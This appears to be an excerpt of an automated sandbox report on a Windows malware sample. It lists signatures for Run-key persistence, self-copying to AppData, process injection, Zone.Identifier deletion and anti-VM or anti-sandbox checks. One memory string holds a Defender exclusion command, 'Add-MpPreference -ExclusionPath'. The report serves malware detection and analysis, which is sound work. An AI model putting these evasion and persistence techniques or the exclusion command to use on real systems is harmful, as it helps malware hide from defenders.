                      Source: 3.0.anyname.exe.1a0000.0.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.2.anyname.exe.1a0000.0.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.anyname.exe.150000.3.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.anyname.exe.150000.0.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.2.anyname.exe.150000.0.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.anyname.exe.150000.1.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.anyname.exe.150000.2.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.anyname.exe.190000.3.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.anyname.exe.190000.0.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.anyname.exe.190000.2.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.anyname.exe.190000.1.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.anyname.exe.190000.0.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: jNnIJrO.exe.6.dr, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 1_2_00016EE0 push cs; retf | 1_2_00016F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 3_2_001A6EE0 push cs; retf | 3_2_001A6F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 4_2_00156EE0 push cs; retf | 4_2_00156F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 5_2_00196EE0 push cs; retf | 5_2_00196F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_00A06EE0 push cs; retf | 6_2_00A06F1A
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_06148540 push es; ret | 6_2_06148550
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Code function: 10_2_00756EE0 push cs; retf | 10_2_00756F1A
                      Source: initial sample | Static PE information: section name: .text entropy: 7.96488968288
                      Source: initial sample | Static PE information: section name: .text entropy: 7.96488968288
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | File created: C:\Users\user\AppData\Local\Temp\tmpG259.tmp (copy)
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | File created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jNnIJrO
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jNnIJrO

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile opened: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe; Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match; File source: 10.2.jNnIJrO.exe.2c92d10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 1.2.anyname.exe.2472cf4.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 1.2.anyname.exe.247ad00.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 10.2.jNnIJrO.exe.2c9ad1c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 16.2.jNnIJrO.exe.2842d10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 16.2.jNnIJrO.exe.284ad1c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000002.420006231.0000000002C61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.338630738.0000000002441000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: anyname.exe PID: 6000, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: jNnIJrO.exe PID: 5952, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: jNnIJrO.exe PID: 5280, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: anyname.exe, 00000001.00000002.338630738.0000000002441000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000A.00000002.420006231.0000000002C61000.00000004.00000001.sdmp, jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmp; Binary or memory string: SBIEDLL.DLL
                      Source: anyname.exe, 00000001.00000002.338630738.0000000002441000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000A.00000002.420006231.0000000002C61000.00000004.00000001.sdmp, jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmp; Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 400; Thread sleep time: -38135s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 5480; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 6448; Thread sleep time: -19369081277395017s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 6584; Thread sleep count: 3203 > 30
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 6584; Thread sleep count: 6652 > 30
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 6300; Thread sleep time: -40853s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 1980; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 4556; Thread sleep time: -34703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 5796; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 7068; Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 6012; Thread sleep count: 2042 > 30
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 6012; Thread sleep count: 7810 > 30
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWindow / User API: threadDelayed 3203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWindow / User API: threadDelayed 6652Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWindow / User API: threadDelayed 2042
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWindow / User API: threadDelayed 7810
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeThread delayed: delay time: 38135Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 40853Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 34703Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeThread delayed: delay time: 922337203685477
                      Source: jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: jNnIJrO.exe, 00000012.00000002.822956172.0000000001550000.00000004.00000010.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                      Source: jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: anyname.exe, 00000006.00000002.822114532.0000000001264000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllter-0000
                      Source: jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_0614FBF0 LdrInitializeThunk,6_2_0614FBF0
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      Benign windows process drops PE files
                      Source: C:\Windows\System32\wscript.exe | File created: anyname.exe.0.dr
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Memory written: C:\Users\user\AppData\Local\Temp\anyname.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Memory written: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Memory written: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe "C:\Users\user\AppData\Local\Temp\anyname.exe"
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Process created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Process created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: anyname.exe, 00000006.00000002.822929398.00000000018C0000.00000002.00020000.sdmp, jNnIJrO.exe, 00000012.00000002.823321744.00000000019E0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                      Source: anyname.exe, 00000006.00000002.822929398.00000000018C0000.00000002.00020000.sdmp, jNnIJrO.exe, 00000012.00000002.823321744.00000000019E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: anyname.exe, 00000006.00000002.822929398.00000000018C0000.00000002.00020000.sdmp, jNnIJrO.exe, 00000012.00000002.823321744.00000000019E0000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: anyname.exe, 00000006.00000002.822929398.00000000018C0000.00000002.00020000.sdmp, jNnIJrO.exe, 00000012.00000002.823321744.00000000019E0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\anyname.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
